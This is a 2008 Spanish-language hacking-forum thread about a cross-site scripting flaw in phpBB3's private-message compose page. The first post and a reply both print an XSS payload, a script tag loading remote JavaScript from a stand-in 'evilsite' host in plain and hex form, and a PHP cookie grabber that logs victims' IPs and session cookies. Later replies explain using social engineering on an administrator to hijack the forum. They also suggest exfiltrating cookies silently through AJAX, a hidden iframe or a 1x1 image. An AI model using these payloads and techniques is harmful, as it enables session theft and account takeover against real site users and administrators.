elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  phpbb3 xss
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: phpbb3 xss  (Leído 4,811 veces)
Satanxlr

Desconectado Desconectado

Mensajes: 10



Ver Perfil
phpbb3 xss
« en: 27 Noviembre 2008, 04:20 am »

Hola, e encontrado este xss

CODE
Use: http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779


Where [xss] need to be changed and replaced with several javascript and/or vBscript, etc (It’s all up to your imaginations) - I’m not going to gave out any step-by-step tutorial for doing this, do your own experiment(s):

CODE
”;!–”<script>alert(document.cookie);</script>=&{(alert(1))}


In order to do any redirection, you can go and use these script(s):

CODE
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e


And in order to put the cookies grabber, you can use this php script:

CODE
    $ip = $_SERVER[’REMOTE_ADDR’];
    $referer = $_SERVER[’HTTP_REFERER’];
    $agent = $_SERVER[’HTTP_USER_AGENT’];

    $data = $_GET[’warwolfz’];
    $time = date(”Y-m-d G:i:s A”);
    $text = “Time: “.$time.”nIP:”.$ip.”nReferer:”.$referer.”nUser-Agent:”.$agent.”nCookie:”.$data.”nn”;

    $file = fopen(’cookies.html’ , ‘a’);
    fwrite($file,$text);
    fclose($file);

    ?>

segun dicen, es en los mps pero no entiendo su funcionamiento

alguien me podria explicar de que trata?
En línea

kernel19

Desconectado Desconectado

Mensajes: 24


Ver Perfil
Re: phpbb3 xss
« Respuesta #1 en: 27 Noviembre 2008, 06:01 am »

Pues viejo a lo que hace referencia es al deface en un foro, y lo de los mensajes privados o MPS es para vos insertar el script y robar la cookie de usario administrador y Ownear el foro obviamente el mensaje debe ser dirigido al moderador o admin con un poquito de ingenieria social, no he visto bien el bug pero conozco de estos ataques Xss.   :D
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: phpbb3 xss
« Respuesta #2 en: 27 Noviembre 2008, 08:33 am »

Se dice que es vulnerable a XSS
:http://es.wikipedia.org/wiki/XSS

Donde se puede injectar diferentes codigos ya sean javascript o vBscript y que ademas no te dara explicaciones de como funciona XDD.

Se puede injectar un codigo ejemplo como este:
Código:
”;!–”<script>alert(document.cookie);</script>=&{(alert(1))}

O puedes aplicar un "redirect" con un .js mailicioso (propio) con estas caracteristicas.
Código:
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e


Donde tambien pudes usar un cookie grabber, basandote en este template:

Código:
    $ip = $_SERVER[’REMOTE_ADDR’];
    $referer = $_SERVER[’HTTP_REFERER’];
    $agent = $_SERVER[’HTTP_USER_AGENT’];

    $data = $_GET[’warwolfz’];
    $time = date(”Y-m-d G:i:s A”);
    $text = “Time: “.$time.”nIP:”.$ip.”nReferer:”.$referer.”nUser-Agent:”.$agent.”nCookie:”.$data.”nn”;

    $file = fopen(’cookies.html’ , ‘a’);
    fwrite($file,$text);
    fclose($file);

    ?>

En línea

Satanxlr

Desconectado Desconectado

Mensajes: 10



Ver Perfil
Re: phpbb3 xss
« Respuesta #3 en: 27 Noviembre 2008, 16:12 pm »

con un poquito de ingenieria social, no he visto bien el bug pero conozco de estos ataques Xss.   :D

en lo de ingenieria social no te preocupes, lo se hacer y de gran manera

lo que no entiendo es

Código:
http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779

se supone que se le envia a la persona?

les e enviado un mensaje, si tengo que leerme un tutorial para poder enviar esto lo hago obviamente si es objetivo y me sirve

se puede activar un link que tome cookies sin crear una redireccion?
solo que se guarde y siga en la pagina actual

Saludos
« Última modificación: 27 Noviembre 2008, 16:18 pm por Satanxlr » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: phpbb3 xss
« Respuesta #4 en: 27 Noviembre 2008, 18:15 pm »

lo recomendable es que vallas y busques informacion sobre XSS antes de volver a preguntar cualquier otra cosa XD

aqui en el foro hay muchos y muy bien explicados
En línea

Satanxlr

Desconectado Desconectado

Mensajes: 10



Ver Perfil
Re: phpbb3 xss
« Respuesta #5 en: 27 Noviembre 2008, 20:36 pm »

lo recomendable es que vallas y busques informacion sobre XSS antes de volver a preguntar cualquier otra cosa

aqui en el foro hay muchos y muy bien explicados

es justamente lo que estoy haciendo aqui
vere lo que tienen sobre xss pero.. que posibilidades hay?
se pueden copiar las cookies sin una redireccion a una web?
lo puedo hacer como aplicacion pero.. lo de enviar de una web a otra pagina seria evidente
« Última modificación: 27 Noviembre 2008, 20:38 pm por Satanxlr » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: phpbb3 xss
« Respuesta #6 en: 27 Noviembre 2008, 23:23 pm »

puedes enviar los datos de la cookie y guardarla con ajax creo recodarecordar, corrijanme si me equivoco...

En caso de que no se pueda con ajax puedes hacer un iframe pequeño mediante javascript y enviar ahí los datos =D
En línea

s E t H

Desconectado Desconectado

Mensajes: 152


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: phpbb3 xss
« Respuesta #7 en: 28 Noviembre 2008, 18:04 pm »

podes poner un <img> apuntando a tu php como si fuera un frame (el navegador va a hacer la peticion igual) y de 1x1
En línea

Satanxlr

Desconectado Desconectado

Mensajes: 10



Ver Perfil
Re: phpbb3 xss
« Respuesta #8 en: 28 Noviembre 2008, 20:17 pm »

podes poner un <img> apuntando a tu php como si fuera un frame (el navegador va a hacer la peticion igual) y de 1x1

tenes toda la razon, es muy util saber esto
e aprendido una o 2 cosas despues de ver los manuales tambien

ahora una duda, e visto que en el asunto de las cookies se puede hacer que se active el php automaticamente.. pero al funcionar esto envia a otra pagina? o sigue en la misma pero ya capto la informacion en el ftp propio

otra aun mas importante

mi duda es, la pagina tiene que ser vulnerable (que ejecute xss) para que funcione el htaccess sumado con la aplicacion php?
 o el hecho de que la imagen funcione como aplicacion hace que la aplicacion sirva de todas maneras, independientemente de si la pagina es o no vulnerable al xss

Saludos
« Última modificación: 28 Noviembre 2008, 20:29 pm por Satanxlr » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas con phpBB3
Desarrollo Web
cula 4 3,163 Último mensaje 3 Octubre 2011, 19:50 pm
por cula
Ayuda con phpbb3
PHP
Descharmes 1 1,367 Último mensaje 12 Abril 2014, 19:38 pm
por #!drvy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines